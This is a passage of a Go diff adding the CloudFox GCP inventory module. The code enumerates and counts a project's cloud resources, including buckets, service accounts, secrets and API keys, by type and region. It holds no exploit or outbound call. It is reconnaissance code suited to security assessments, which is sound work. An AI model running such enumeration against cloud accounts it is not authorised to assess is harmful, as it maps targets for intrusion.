make(map[string]map[string]bool), + projectTotalByType: make(map[string]map[string]int), + projectTotalByRegion: make(map[string]map[string]int), + projectGrandTotal: make(map[string]int), + assetCounts: make(map[string]map[string]int), + enabledServices: make(map[string][]string), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *InventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Starting resource inventory enumeration...", GCP_INVENTORY_MODULE_NAME) + + // Initialize resource type maps for each project + for _, projectID := range m.ProjectIDs { + m.initializeResourceTypesForProject(projectID) + } + + // First, get complete asset counts from Cloud Asset Inventory API + // This provides comprehensive coverage of ALL resources + logger.InfoM("Querying Cloud Asset Inventory for complete resource coverage...", GCP_INVENTORY_MODULE_NAME) + m.collectAssetInventory(ctx, logger) + + // If Asset Inventory API failed, try Service Usage API as a fallback + // This shows which services are enabled (indicates potential resources) + if !m.assetAPIEnabled { + logger.InfoM("Falling back to Service Usage API to identify enabled services...", GCP_INVENTORY_MODULE_NAME) + m.collectEnabledServices(ctx, logger) + } + + // Then run detailed enumeration for security-relevant resources + // This always runs as a backup and provides security metadata + logger.InfoM("Running detailed enumeration for security analysis...", GCP_INVENTORY_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_INVENTORY_MODULE_NAME, m.processProject) + + // Calculate totals + m.calculateTotals() + + if m.grandTotal == 0 && m.assetGrandTotal == 0 && len(m.enabledServices) == 0 { + logger.InfoM("No resources found", GCP_INVENTORY_MODULE_NAME) + return + } + + // Show summary based on what data we got + if m.assetAPIEnabled { + logger.SuccessM(fmt.Sprintf("Cloud Asset Inventory: %d total resources across %d asset types", + m.assetGrandTotal, 
m.countAssetTypes()), GCP_INVENTORY_MODULE_NAME) + } else if len(m.enabledServices) > 0 { + totalServices := 0 + for _, services := range m.enabledServices { + totalServices += len(services) + } + logger.SuccessM(fmt.Sprintf("Service Usage API: %d enabled services detected (may contain resources CloudFox doesn't enumerate)", + totalServices), GCP_INVENTORY_MODULE_NAME) + } + logger.SuccessM(fmt.Sprintf("CloudFox enumeration: %d resources across %d project(s) (with security metadata)", + m.grandTotal, len(m.projectGrandTotal)), GCP_INVENTORY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// initializeResourceTypes sets up the resource type maps for a project +func (m *InventoryModule) initializeResourceTypesForProject(projectID string) { + m.mu.Lock() + defer m.mu.Unlock() + + if m.projectResourceCounts[projectID] != nil { + return // Already initialized + } + + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) + m.projectRegions[projectID] = make(map[string]bool) + m.projectTotalByType[projectID] = make(map[string]int) + m.projectTotalByRegion[projectID] = make(map[string]int) +} + +// processProject enumerates all resources in a single project +func (m *InventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resources in project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + var wg sync.WaitGroup + semaphore := make(chan struct{}, 10) // Limit concurrent API calls per project + + // Compute resources + wg.Add(1) + go m.enumComputeInstances(ctx, projectID, &wg, semaphore) + + // GKE + wg.Add(1) + go m.enumGKEClusters(ctx, projectID, &wg, semaphore) + + // Cloud Run + wg.Add(1) + go m.enumCloudRun(ctx, projectID, &wg, semaphore) + + // Cloud Functions + wg.Add(1) + go m.enumCloudFunctions(ctx, projectID, &wg, 
semaphore) + + // Storage + wg.Add(1) + go m.enumBuckets(ctx, projectID, &wg, semaphore) + + // BigQuery + wg.Add(1) + go m.enumBigQuery(ctx, projectID, &wg, semaphore) + + // Cloud SQL + wg.Add(1) + go m.enumCloudSQL(ctx, projectID, &wg, semaphore) + + // Spanner + wg.Add(1) + go m.enumSpanner(ctx, projectID, &wg, semaphore) + + // Bigtable + wg.Add(1) + go m.enumBigtable(ctx, projectID, &wg, semaphore) + + // Memorystore + wg.Add(1) + go m.enumMemorystore(ctx, projectID, &wg, semaphore) + + // Filestore + wg.Add(1) + go m.enumFilestore(ctx, projectID, &wg, semaphore) + + // Service Accounts + wg.Add(1) + go m.enumServiceAccounts(ctx, projectID, &wg, semaphore) + + // KMS + wg.Add(1) + go m.enumKMS(ctx, projectID, &wg, semaphore) + + // Secrets + wg.Add(1) + go m.enumSecrets(ctx, projectID, &wg, semaphore) + + // API Keys + wg.Add(1) + go m.enumAPIKeys(ctx, projectID, &wg, semaphore) + + // Pub/Sub + wg.Add(1) + go m.enumPubSub(ctx, projectID, &wg, semaphore) + + // DNS + wg.Add(1) + go m.enumDNS(ctx, projectID, &wg, semaphore) + + // Cloud Build + wg.Add(1) + go m.enumCloudBuild(ctx, projectID, &wg, semaphore) + + // Source Repos + wg.Add(1) + go m.enumSourceRepos(ctx, projectID, &wg, semaphore) + + // Artifact Registry + wg.Add(1) + go m.enumArtifactRegistry(ctx, projectID, &wg, semaphore) + + // Dataflow + wg.Add(1) + go m.enumDataflow(ctx, projectID, &wg, semaphore) + + // Dataproc + wg.Add(1) + go m.enumDataproc(ctx, projectID, &wg, semaphore) + + // Notebooks + wg.Add(1) + go m.enumNotebooks(ctx, projectID, &wg, semaphore) + + // Composer + wg.Add(1) + go m.enumComposer(ctx, projectID, &wg, semaphore) + + // Scheduler + wg.Add(1) + go m.enumScheduler(ctx, projectID, &wg, semaphore) + + // Logging Sinks + wg.Add(1) + go m.enumLoggingSinks(ctx, projectID, &wg, semaphore) + + // Cloud Armor + wg.Add(1) + go m.enumCloudArmor(ctx, projectID, &wg, semaphore) + + // SSL Certificates + wg.Add(1) + go m.enumSSLCertificates(ctx, projectID, &wg, semaphore) + + 
wg.Wait() +} + +// Resource enumeration functions + +func (m *InventoryModule) enumComputeInstances(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := computeengineservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + region := extractRegionFromZone(inst.Zone) + m.addResource(projectID, "Compute Instances", region, fmt.Sprintf("projects/%s/zones/%s/instances/%s", projectID, inst.Zone, inst.Name)) + } +} + +func (m *InventoryModule) enumGKEClusters(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := gkeservice.New() + clusters, _, err := svc.Clusters(projectID) // Returns clusters, nodePools, error + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource(projectID, "GKE Clusters", cluster.Location, fmt.Sprintf("projects/%s/locations/%s/clusters/%s", projectID, cluster.Location, cluster.Name)) + } +} + +func (m *InventoryModule) enumCloudRun(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudrunservice.New() + services, err := svc.Services(projectID) + if err == nil { + for _, s := range services { + m.addResource(projectID, "Cloud Run Services", s.Region, fmt.Sprintf("projects/%s/locations/%s/services/%s", projectID, s.Region, s.Name)) + } + } + + jobs, err := svc.Jobs(projectID) + if err == nil { + for _, job := range jobs { + m.addResource(projectID, "Cloud Run Jobs", job.Region, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Region, job.Name)) + } + } +} + +func (m *InventoryModule) enumCloudFunctions(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() 
{ <-sem }() + + svc := functionsservice.New() + functions, err := svc.Functions(projectID) + if err != nil { + return + } + + for _, fn := range functions { + m.addResource(projectID, "Cloud Functions", fn.Region, fmt.Sprintf("projects/%s/locations/%s/functions/%s", projectID, fn.Region, fn.Name)) + } +} + +func (m *InventoryModule) enumBuckets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudstorageservice.New() + buckets, err := svc.Buckets(projectID) + if err != nil { + return + } + + for _, bucket := range buckets { + m.addResource(projectID, "Cloud Storage Buckets", bucket.Location, fmt.Sprintf("gs://%s", bucket.Name)) + } +} + +func (m *InventoryModule) enumBigQuery(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigqueryservice.New() + datasets, err := svc.BigqueryDatasets(projectID) + if err != nil { + return + } + + for _, ds := range datasets { + m.addResource(projectID, "BigQuery Datasets", ds.Location, fmt.Sprintf("projects/%s/datasets/%s", projectID, ds.DatasetID)) + } +} + +func (m *InventoryModule) enumCloudSQL(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudsqlservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Cloud SQL Instances", inst.Region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumSpanner(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + return + } + + 
for _, inst := range result.Instances { + // Spanner config contains region info + region := "global" + if inst.Config != "" { + region = inst.Config + } + m.addResource(projectID, "Spanner Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumBigtable(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range result.Instances { + // Use first cluster location as region + region := "global" + if len(inst.Clusters) > 0 { + region = inst.Clusters[0].Location + } + m.addResource(projectID, "Bigtable Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumMemorystore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Memorystore Redis", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumFilestore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Filestore Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumServiceAccounts(ctx context.Context, projectID string, wg 
*sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := iamservice.New() + // Use ServiceAccountsBasic to avoid querying keys (faster, fewer permissions needed) + accounts, err := svc.ServiceAccountsBasic(projectID) + if err != nil { + return + } + + for _, sa := range accounts { + m.addResource(projectID, "Service Accounts", "global", sa.Email) + } +} + +func (m *InventoryModule) enumKMS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := kmsservice.New() + keyRings, err := svc.KeyRings(projectID) + if err != nil { + return + } + + for _, kr := range keyRings { + m.addResource(projectID, "KMS Key Rings", kr.Location, fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name)) + } +} + +func (m *InventoryModule) enumSecrets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := secretsservice.NewWithSession(nil) + if err != nil { + return + } + secrets, err := svc.Secrets(projectID) + if err != nil { + return + } + + for _, secret := range secrets { + // Secrets are global but may have regional replicas + region := "global" + if len(secret.ReplicaLocations) > 0 { + region = secret.ReplicaLocations[0] + } + m.addResource(projectID, "Secrets", region, secret.Name) + } +} + +func (m *InventoryModule) enumAPIKeys(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := apikeysservice.New() + keys, err := svc.ListAPIKeys(projectID) + if err != nil { + return + } + + for _, key := range keys { + m.addResource(projectID, "API Keys", "global", key.Name) + } +} + +func (m *InventoryModule) enumPubSub(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer 
wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := pubsubservice.New() + topics, err := svc.Topics(projectID) + if err == nil { + for _, topic := range topics { + m.addResource(projectID, "Pub/Sub Topics", "global", fmt.Sprintf("projects/%s/topics/%s", projectID, topic.Name)) + } + } + + subscriptions, err := svc.Subscriptions(projectID) + if err == nil { + for _, sub := range subscriptions { + m.addResource(projectID, "Pub/Sub Subscriptions", "global", fmt.Sprintf("projects/%s/subscriptions/%s", projectID, sub.Name)) + } + } +} + +func (m *InventoryModule) enumDNS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dnsservice.New() + zones, err := svc.Zones(projectID) + if err != nil { + return + } + + for _, zone := range zones { + m.addResource(projectID, "DNS Zones", "global", fmt.Sprintf("projects/%s/managedZones/%s", projectID, zone.Name)) + } +} + +func (m *InventoryModule) enumCloudBuild(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudbuildservice.New() + triggers, err := svc.ListTriggers(projectID) + if err != nil { + return + } + + for _, trigger := range triggers { + region := "global" + m.addResource(projectID, "Cloud Build Triggers", region, fmt.Sprintf("projects/%s/locations/%s/triggers/%s", projectID, region, trigger.Name)) + } +} + +func (m *InventoryModule) enumSourceRepos(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource(projectID, "Source Repositories", "global", fmt.Sprintf("projects/%s/repos/%s", projectID, repo.Name)) + } +} + +func (m *InventoryModule) 
enumArtifactRegistry(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := artifactregistryservice.NewWithSession(nil) + if err != nil { + return + } + repos, err := svc.Repositories(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource(projectID, "Artifact Registries", repo.Location, fmt.Sprintf("projects/%s/locations/%s/repositories/%s", projectID, repo.Location, repo.Name)) + } +} + +func (m *InventoryModule) enumDataflow(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource(projectID, "Dataflow Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.ID)) + } +} + +func (m *InventoryModule) enumDataproc(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataprocservice.New() + clusters, err := svc.ListClusters(projectID) + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource(projectID, "Dataproc Clusters", cluster.Region, fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, cluster.Region, cluster.Name)) + } +} + +func (m *InventoryModule) enumNotebooks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := notebooksservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Notebook Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} 
+ +func (m *InventoryModule) enumComposer(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := composerservice.New() + envs, err := svc.ListEnvironments(projectID) + if err != nil { + return + } + + for _, env := range envs { + m.addResource(projectID, "Composer Environments", env.Location, fmt.Sprintf("projects/%s/locations/%s/environments/%s", projectID, env.Location, env.Name)) + } +} + +func (m *InventoryModule) enumScheduler(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := schedulerservice.New() + jobs, err := svc.Jobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource(projectID, "Scheduler Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.Name)) + } +} + +func (m *InventoryModule) enumLoggingSinks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := loggingservice.New() + sinks, err := svc.Sinks(projectID) + if err != nil { + return + } + + for _, sink := range sinks { + m.addResource(projectID, "Log Sinks", "global", fmt.Sprintf("projects/%s/sinks/%s", projectID, sink.Name)) + } +} + +func (m *InventoryModule) enumCloudArmor(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudarmorservice.New() + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + return + } + + for _, policy := range policies { + m.addResource(projectID, "Cloud Armor Policies", "global", fmt.Sprintf("projects/%s/global/securityPolicies/%s", projectID, policy.Name)) + } +} + +func (m *InventoryModule) enumSSLCertificates(ctx context.Context, projectID string, wg 
*sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := certmanagerservice.New() + certs, err := svc.GetCertificates(projectID) + if err != nil { + return + } + + for _, cert := range certs { + m.addResource(projectID, "SSL Certificates", cert.Location, fmt.Sprintf("projects/%s/locations/%s/certificates/%s", projectID, cert.Location, cert.Name)) + } +} + +// addResource safely adds a resource count for a specific project +func (m *InventoryModule) addResource(projectID, resourceType, region, resourceID string) { + m.mu.Lock() + defer m.mu.Unlock() + + // Normalize region + if region == "" { + region = "global" + } + region = strings.ToLower(region) + + // Track region for this project + if m.projectRegions[projectID] == nil { + m.projectRegions[projectID] = make(map[string]bool) + } + m.projectRegions[projectID][region] = true + + // Increment count + if m.projectResourceCounts[projectID] == nil { + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + } + if m.projectResourceCounts[projectID][resourceType] == nil { + m.projectResourceCounts[projectID][resourceType] = make(map[string]int) + } + m.projectResourceCounts[projectID][resourceType][region]++ + + // Track resource ID + if m.projectResourceIDs[projectID] == nil { + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) + } + if m.projectResourceIDs[projectID][resourceType] == nil { + m.projectResourceIDs[projectID][resourceType] = make(map[string][]string) + } + m.projectResourceIDs[projectID][resourceType][region] = append(m.projectResourceIDs[projectID][resourceType][region], resourceID) +} + +// calculateTotals computes the total counts per project and globally +func (m *InventoryModule) calculateTotals() { + for projectID, resourceCounts := range m.projectResourceCounts { + if m.projectTotalByType[projectID] == nil { + m.projectTotalByType[projectID] = make(map[string]int) + } + if 
m.projectTotalByRegion[projectID] == nil { + m.projectTotalByRegion[projectID] = make(map[string]int) + } + + for resourceType, regionCounts := range resourceCounts { + for region, count := range regionCounts { + m.projectTotalByType[projectID][resourceType] += count + m.projectTotalByRegion[projectID][region] += count + m.projectGrandTotal[projectID] += count + m.grandTotal += count + } + } + } +} + +// collectAssetInventory queries Cloud Asset Inventory API for complete resource counts +func (m *InventoryModule) collectAssetInventory(ctx context.Context, logger internal.Logger) { + svc := assetservice.New() + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying asset inventory for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.mu.Lock() + m.assetAPIFailedProjs = append(m.assetAPIFailedProjs, projectID) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query asset inventory for project %s (API may not be enabled)", projectID)) + } + continue + } + + m.mu.Lock() + m.assetAPIEnabled = true // At least one project succeeded + if m.assetCounts[projectID] == nil { + m.assetCounts[projectID] = make(map[string]int) + } + for _, c := range counts { + m.assetCounts[projectID][c.AssetType] = c.Count + m.assetGrandTotal += c.Count + } + m.mu.Unlock() + } + + // Show warning if Asset API failed for some/all projects + if len(m.assetAPIFailedProjs) > 0 { + if !m.assetAPIEnabled { + logger.InfoM("WARNING: Cloud Asset Inventory API not enabled in any project.", GCP_INVENTORY_MODULE_NAME) + logger.InfoM("To enable complete resource coverage, enable the Cloud Asset API:", GCP_INVENTORY_MODULE_NAME) + logger.InfoM(" gcloud services enable cloudasset.googleapis.com --project=", 
GCP_INVENTORY_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("WARNING: Cloud Asset Inventory API failed for %d project(s): %s", + len(m.assetAPIFailedProjs), strings.Join(m.assetAPIFailedProjs, ", ")), GCP_INVENTORY_MODULE_NAME) + logger.InfoM("These projects will only show CloudFox enumerated resources (potential blind spots)", GCP_INVENTORY_MODULE_NAME) + } + } +} + +// collectEnabledServices queries Service Usage API to find enabled services +// This is a fallback when Asset Inventory API is not available +func (m *InventoryModule) collectEnabledServices(ctx context.Context, logger internal.Logger) { + svc, err := serviceusage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not create Service Usage client: %v", err), GCP_INVENTORY_MODULE_NAME) + } + return + } + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying enabled services for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + var enabledServices []string + + req := svc.Services.List(parent).Filter("state:ENABLED") + err := req.Pages(ctx, func(page *serviceusage.ListServicesResponse) error { + for _, service := range page.Services { + // Extract service name from full path + // Format: projects/123/services/compute.googleapis.com + parts := strings.Split(service.Name, "/") + serviceName := parts[len(parts)-1] + enabledServices = append(enabledServices, serviceName) + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query enabled services for project %s", projectID)) + } + continue + } + + m.mu.Lock() + m.enabledServices[projectID] = enabledServices + m.mu.Unlock() + } +} + +// getInterestingServices filters enabled services to show only 
those that likely contain resources +func getInterestingServices(services []string) []string { + // Services that typically contain enumerable resources + interestingPrefixes := []string{ + "compute.googleapis.com", + "container.googleapis.com", + "run.googleapis.com", + "cloudfunctions.googleapis.com", + "storage.googleapis.com", + "bigquery.googleapis.com", + "sqladmin.googleapis.com", + "spanner.googleapis.com", + "bigtable.googleapis.com", + "redis.googleapis.com", + "file.googleapis.com", + "secretmanager.googleapis.com", + "cloudkms.googleapis.com", + "pubsub.googleapis.com", + "cloudbuild.googleapis.com", + "sourcerepo.googleapis.com", + "artifactregistry.googleapis.com", + "dataflow.googleapis.com", + "dataproc.googleapis.com", + "notebooks.googleapis.com", + "composer.googleapis.com", + "dns.googleapis.com", + "apikeys.googleapis.com", + "cloudscheduler.googleapis.com", + "logging.googleapis.com", + "aiplatform.googleapis.com", + "ml.googleapis.com", + "healthcare.googleapis.com", + "firestore.googleapis.com", + "appengine.googleapis.com", + } + + var interesting []string + for _, svc := range services { + for _, prefix := range interestingPrefixes { + if svc == prefix { + interesting = append(interesting, svc) + break + } + } + } + return interesting +} + +// isServiceCoveredByCloudFox checks if CloudFox has dedicated enumeration for a service +func isServiceCoveredByCloudFox(serviceName string) bool { + coveredServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": 
true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + } + return coveredServices[serviceName] +} + +// isInterestingService checks if a service typically contains enumerable resources +func isInterestingService(serviceName string) bool { + interestingServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "storage-component.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "containerregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + "aiplatform.googleapis.com": true, + "ml.googleapis.com": true, + "healthcare.googleapis.com": true, + "firestore.googleapis.com": true, + "appengine.googleapis.com": true, + "vpcaccess.googleapis.com": true, + "servicenetworking.googleapis.com": true, + "memcache.googleapis.com": true, + "documentai.googleapis.com": true, + "dialogflow.googleapis.com": true, + 
"translate.googleapis.com": true, + "vision.googleapis.com": true, + "speech.googleapis.com": true, + "texttospeech.googleapis.com": true, + "videointelligence.googleapis.com": true, + "automl.googleapis.com": true, + "datacatalog.googleapis.com": true, + "dataplex.googleapis.com": true, + "datastream.googleapis.com": true, + "eventarc.googleapis.com": true, + "workflows.googleapis.com": true, + "gameservices.googleapis.com": true, + } + return interestingServices[serviceName] +} + +// getServiceDescription returns a human-readable description of a GCP service +func getServiceDescription(serviceName string) string { + descriptions := map[string]string{ + "compute.googleapis.com": "VMs, Disks, Networks, Firewalls", + "container.googleapis.com": "GKE Clusters", + "run.googleapis.com": "Cloud Run Services/Jobs", + "cloudfunctions.googleapis.com": "Cloud Functions", + "storage.googleapis.com": "Cloud Storage Buckets", + "bigquery.googleapis.com": "BigQuery Datasets/Tables", + "sqladmin.googleapis.com": "Cloud SQL Instances", + "spanner.googleapis.com": "Spanner Instances", + "bigtableadmin.googleapis.com": "Bigtable Instances", + "redis.googleapis.com": "Memorystore Redis", + "file.googleapis.com": "Filestore Instances", + "secretmanager.googleapis.com": "Secret Manager Secrets", + "cloudkms.googleapis.com": "KMS Keys", + "pubsub.googleapis.com": "Pub/Sub Topics/Subscriptions", + "cloudbuild.googleapis.com": "Cloud Build Triggers", + "sourcerepo.googleapis.com": "Source Repositories", + "artifactregistry.googleapis.com": "Artifact Registry Repos", + "containerregistry.googleapis.com": "Container Registry (gcr.io)", + "dataflow.googleapis.com": "Dataflow Jobs", + "dataproc.googleapis.com": "Dataproc Clusters", + "notebooks.googleapis.com": "AI Notebooks", + "composer.googleapis.com": "Cloud Composer (Airflow)", + "dns.googleapis.com": "Cloud DNS Zones", + "apikeys.googleapis.com": "API Keys", + "cloudscheduler.googleapis.com": "Cloud Scheduler Jobs", + 
"logging.googleapis.com": "Cloud Logging", + "iam.googleapis.com": "IAM Service Accounts", + "aiplatform.googleapis.com": "Vertex AI Resources", + "ml.googleapis.com": "AI Platform Models", + "healthcare.googleapis.com": "Healthcare API Datasets", + "firestore.googleapis.com": "Firestore Databases", + "appengine.googleapis.com": "App Engine Services", + "vpcaccess.googleapis.com": "VPC Access Connectors", + "memcache.googleapis.com": "Memorystore Memcached", + "documentai.googleapis.com": "Document AI Processors", + "dialogflow.googleapis.com": "Dialogflow Agents", + "datacatalog.googleapis.com": "Data Catalog Entries", + "dataplex.googleapis.com": "Dataplex Lakes", + "datastream.googleapis.com": "Datastream Streams", + "eventarc.googleapis.com": "Eventarc Triggers", + "workflows.googleapis.com": "Cloud Workflows", + } + if desc, ok := descriptions[serviceName]; ok { + return desc + } + return "May contain resources" +} + +// countAssetTypes returns the number of unique asset types found +func (m *InventoryModule) countAssetTypes() int { + types := make(map[string]bool) + for _, projectCounts := range m.assetCounts { + for assetType := range projectCounts { + types[assetType] = true + } + } + return len(types) +} + +// getAssetTypeTotals aggregates asset counts across all projects +func (m *InventoryModule) getAssetTypeTotals() map[string]int { + 